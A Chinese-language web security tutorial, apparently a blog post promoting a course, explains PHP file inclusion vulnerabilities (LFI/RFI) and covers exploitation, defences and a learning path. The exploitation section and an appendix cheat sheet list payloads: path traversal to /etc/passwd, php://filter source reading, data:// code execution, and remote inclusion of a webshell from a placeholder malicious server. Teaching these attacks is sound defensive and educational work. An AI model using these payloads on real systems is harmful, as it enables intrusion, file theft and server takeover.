
URL 里有个page参数你可能正把门打开pagehome.php→ 正常页面page../../etc/passwd→读到敏感文件pagehttp://恶意地址→加载远程内容文件包含漏洞程序根据参数加载文件攻击者控制参数——读源码、读配置、甚至包含恶意代码。这篇文章把文件包含是什么、LFI/RFI 区别、利用方式、怎么测、怎么防、学习路线一次讲透——看完你就懂一个page参数能干什么。红线先行所有测试只允许在自建靶场或授权范围内进行文件包含是什么一句话认知文件包含漏洞程序用include()等函数按参数加载文件攻击者控制参数——加载了本不该加载的文件。一句话认知“文件包含把’门牌号’交给你填——程序本来只加载’首页’你改成’保险柜’它就真去开保险柜了。”两种类型LFI本地文件包含包含服务器上的文件读源码/配置 RFI远程文件包含包含远程文件加载恶意代码核心本质“程序不校验’加载什么’——‘参数指哪程序加载哪’。”一、常见场景文件包含藏在哪①页面加载参数最经典?pagehome.php # 正常 ?pageabout.php # 切换页面②语言/主题切换加载语言包、主题文件③模板/视图加载按参数加载模板文件一句话“三大场景页面参数、语言切换、模板加载——‘凡是按参数’取文件’的地方都可能中招’。”二、利用方式怎么加载不该加载的原理①路径穿越LFI 读文件?page../../../../etc/passwd # 穿越目录 ?page../../etc/passwd%00 # 截断老版本②日志注入LFI 日志日志里写入 PHP 代码 → 包含日志 → 执行③伪协议PHP?pagephp://filter/readconvert.base64-encode/resourceconfig.php # 读源码 ?pagedata://text/plain,?php phpinfo();? # 执行代码④RFI 远程包含?pagehttp://恶意服务器/webshell.txt一句话“四招利用路径穿越、日志注入、伪协议、远程包含——‘穿越读文件、日志写代码、伪协议读码、远程上马’。”三、危害有多大文件包含能干什么①读取敏感文件源码、配置、数据库密码②执行代码RCE日志注入/伪协议 → 执行PHP代码③RFI 上马加载远程木马 → 服务器控制④信息收集跳板读文件为后续渗透铺路一句话“四大危害读文件、执行代码、远程上马、铺路渗透——‘从读一个文件到控制一台服务器’。”四、怎么防文件包含防御三招①白名单校验最核心只允许加载预设的合法文件参数映射到固定值不直接拼接路径②路径规范化禁止../、..\穿越解析并校验最终真实路径③关闭危险配置PHP 关闭allow_url_include防RFI禁用危险伪协议非必要一句话“三招防御白名单、路径校验、关危险配置——‘不让填、不让穿、不让远程’。”五、文件包含学习路线从原理到实战新手版阶段1原理理解1周懂 LFI/RFI 区别懂常见场景page参数自建靶场跑通路径穿越合规阶段2利用练习2-3周靶场练路径穿越读文件学伪协议读源码php://filter学日志注入原理阶段3防御与延伸2-3周学防御方案白名单/路径校验学 RFI 与 RCE 关系输出一份文件包含测试修复笔记本阶段目标“能在靶场独立复现LFI讲清利用与防御”。检验标准靶场完成一次路径穿越读文件一次伪协议读源码合规环境。恭喜你文件包含入门达成如果学到这里你已经掌握文件包含体系可以从事Web渗透测试初级SRC漏洞挖掘CTF选手Web方向薪资区间8k-20k文件包含是 CTF/SRC/渗透高频考点。这条路大概需要 1-2 个月的系统投入。那么你还想继续探索吗学习交流文件包含是“CTF 常客、SRC 高频、经典到不能再经典”的 Web 漏洞——原理简单但’路径穿越、伪协议、日志注入’的利用组合才是价值——而自学最坑的是’知道有LFI不会穿越读了文件不知道怎么进一步利用’。原理讲透LFI/RFI 一次分清靶场带练穿越/伪协议练到会防御同授会打也会防面试通吃如果你想系统学习网络安全、拿下文件包含OWASP漏洞体系课程文件包含→命令注入→XXE靶场带练DVWA/Pikachu 实战复现CTF/SRC 实战指引考点挖洞流程就业指导渗透/CTF方向作品简历规划想系统学习网络安全、拿下文件包含的评论区扣1或私信老师咨询课程详情。特别声明此教程为纯技术分享本文目的绝不是为怀有不良动机的人提供技术支持也不承担因为技术被滥用所产生的连带责任本文所有漏洞测试只允许在自建靶场、CTF平台或授权范围内进行严禁对未授权目标测试目的是唤醒大家对网络安全的重视采取相应的安全措施减少因网络安全带来的经济损失【深度附录】文件包含·FAQ与速查附录一文件包含 FAQQ1LFI 和 RFI 哪个更危险RFI 更直接能加载远程代码→RCE——“一个读文件一个直接执行”。Q2路径穿越能读所有文件吗看权限受目录权限限制——“越权能读的才读得到”。Q3伪协议是什么PHP特性php://等特殊流——“读源码、执行代码都靠它”。Q4日志注入怎么做先写后含UA/日志里写代码再包含日志——“借日志这个’中转站’”。Q5怎么判断有没有文件包含试参数把 page 改成穿越路径看回显——“靶场里试合规判断”。Q6学这个对就业帮助大吗很大CTF/SRC/渗透都考——“经典漏洞渗透基本功”。附录二文件包含载荷速查仅靶场场景载荷路径穿越?page../../../../etc/passwd读源码?pagephp://filter/convert.base64-encode/resourceconfig.php执行代码?pagedata://text/plain,?php phpinfo();?远程包含?pagehttp://恶意服务器/shell.txt一句话“四个载荷背下来靶场练习就’够用’了——‘穿越、读码、执行、远程’。”附录三文件包含·每日一句话给想学 Web 的你“LFI读本地、RFI加载远程”“page参数指哪程序加载哪”“白名单、路径校验、关危险配置”一句话“三句话背下来文件包含就’稳’了——‘两类型、指哪加载、三招防’。”附录四给新手的忠告只打靶场DVWA/Pikachu 随便练先懂类型LFI/RFI 先分清学伪协议读源码是核心技能会打会防修复方案也要会写合规红线只测授权/自建目标一句话“文件包含五忠告打靶场、懂类型、学伪协议、会修复、守红线——五样齐就入门了。”附录五浓缩成三句话LFI读本地、RFI加载远程——参数指哪加载哪四招利用穿越、日志注入、伪协议、远程三招防御白名单、路径校验、关危险配置附录六文件包含·常见误区提醒误区真相“只有PHP有”其他语言也有类似“穿越能读所有”受权限限制“RFI已绝迹”配置不当仍存在“过滤…/就行”编码/截断可绕过“包含是小事”能执行代码RCE一句话“五个误区就是文件包含最常见的’想当然’——想当然最容易看漏。”附录七文件包含·面试常考题LFI/RFI 区别路径穿越怎么做php://filter 是干什么的文件包含怎么防御答题思路类型利用防御——“讲得清类型答得上利用防御就稳了”。一句话“文件包含面试考’类型利用’——LFI/RFI、穿越、伪协议、三招防’答全。”附录八文件包含·资源导航类别资源用途靶场DVWA/Pikachu漏洞复现工具BurpSuite改包测试文档PHP手册伪协议参考案例CTF题解学思路课程体系课系统学习一句话“五类资源配齐文件包含就’有得练’——‘靶场复现、CTF学思路、PHP手册查协议’。”附录九最后的最后文件包含的全部内容讲完了。最后送你一份行动清单今天搞懂 LFI/RFI 区别本周靶场复现路径穿越合规本月学伪协议读源码本季输出测试修复笔记附录十文件包含·一句通关小结把全文浓缩成五步通关懂类型LFI读本地、RFI加载远程找场景page参数/语言切换/模板会利用穿越读文件、伪协议读码学延伸日志注入、RFI上马知防御白名单、路径校验、关危险配置一句话“五步走完文件包含就’入门’了——类型、场景、利用、延伸、防御。”想系统学习网络安全、拿下文件包含的——评论区扣1或私信老师咨询课程详情。